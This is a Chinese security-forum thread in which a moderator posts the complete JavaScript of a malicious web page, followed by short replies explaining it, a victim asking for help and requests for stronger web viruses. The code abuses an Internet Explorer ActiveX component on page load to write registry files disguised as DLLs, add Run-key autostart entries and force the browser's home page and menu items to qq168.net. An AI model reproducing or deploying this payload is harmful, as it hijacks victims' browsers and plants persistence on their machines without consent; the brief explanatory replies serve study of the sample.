论坛: 病毒专区 标题: 一个恶意网页的代码 复制本贴地址    
作者: bedlamite [bedlamite]    版主   登录
.....................................................
<html><script language="">
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent.class></APPLET>"); 
function runcmd()  
{  
a=document.applets[0];  
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');  
a.createInstance();  
Shl=a.GetObject();  
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');  
a.createInstance();  
fso=a.GetObject();  
var wf1=fso.CreateTextFile("c:\\windows\\system\\systel.dll",true);  
wf1.writeLine('REGEDIT4'); 
wf1.WriteBlankLines(1);  
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Start Page"="http://www.qq168.net"');  
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');  
wf1.WriteLine('"Local Page"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);  
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);  
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Start Page"="http://www.qq168.net"');  
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');  
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');  
wf1.WriteLine('"Local Page"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');  
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"'); 
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]');  
wf1.WriteLine('"Start Page"="regedit -s c:\\windows\\system\\systel.dll"');  
wf1.WriteBlankLines(1); 
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Start Page"="http://www.qq168.net"');  
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');  
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');  
wf1.WriteLine('"Local Page"="http://www.qq168.net"'); 
wf1.Close();

var wf1=fso.CreateTextFile("c:\\windows\\system.dll",true);  
wf1.writeLine('REGEDIT4'); 
wf1.WriteBlankLines(1);  
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Start Page"="http://www.qq168.net"');  
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');  
wf1.WriteLine('"Local Page"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);  
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);  
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Start Page"="http://www.qq168.net"');  
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');  
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');  
wf1.WriteLine('"Local Page"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');  
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"'); 
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]');  
wf1.WriteLine('"win"="regedit -s c:\\\\windows\\\\system\\\\systel.dll"');      
wf1.WriteBlankLines(1); 
wf1.WriteLine('rcx');
wf1.Close();

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "regedit -s c:\\windows\\system\\systel.dll"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Pagewin", "regedit -s c:\\windows\\system\\systel.dll");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win1", "regedit -s c:\\windows\\system.dll"); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net");  
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net"); 
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\First Home Page", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\☆♀精彩网站♀☆\\", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\�t☆顶级DJ舞曲☆�s\\", "http://www.qq168.net");
}  
setTimeout('runcmd()',1000);

</script>
.............................................

地主 发表时间: 04/26 09:41

回复: z7 [skyzz]   论坛用户   登录
详细解释一下 

system.dll的用处


B1层 发表时间: 05/01 09:25

回复: CyberSpy [cyberspy]   论坛用户   登录
详细解释一下 

system.dll的用处


其实就是一个vbs文件嘛,你用记事本打开看看内容就知道了!
修改注册表达到改主页、开机自动运行等作用



B2层 发表时间: 05/01 16:14

回复: ma2751_cn [ma2751_cn]      登录
在电脑生成一个system.dll文件,修改注册表开机启动。其实system.dll就是一个伪装的VBS文件~~~

B3层 发表时间: 05/02 03:42

回复: iloveleon [iloveleon]   论坛用户   登录
我中彪了 QQ不能正常用 到底怎么改?
救命啊!

B4层 发表时间: 05/04 20:55

回复: aserict [aserict]   论坛用户   登录
还有没有更厉害的呀。比如说极限女孩这样的网页病毒

B5层 发表时间: 03-12-23 19:35

回复: newmyth21 [newmyth21]   论坛用户   登录
这个我狂顶了。

B6层 发表时间: 03-12-23 19:37

回复: moley [moley]   论坛用户   登录
顶!!!!!!!!!!!!!!!!狂!

B7层 发表时间: 03-12-23 20:14

回复: moley [moley]   论坛用户   登录
顶!!!!!!!!!!!!!!!!狂!

B8层 发表时间: 03-12-23 20:14

回复: moley [moley]   论坛用户   登录
顶!!!!!!!!!!!!!!!!狂!

B9层 发表时间: 03-12-23 20:15

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号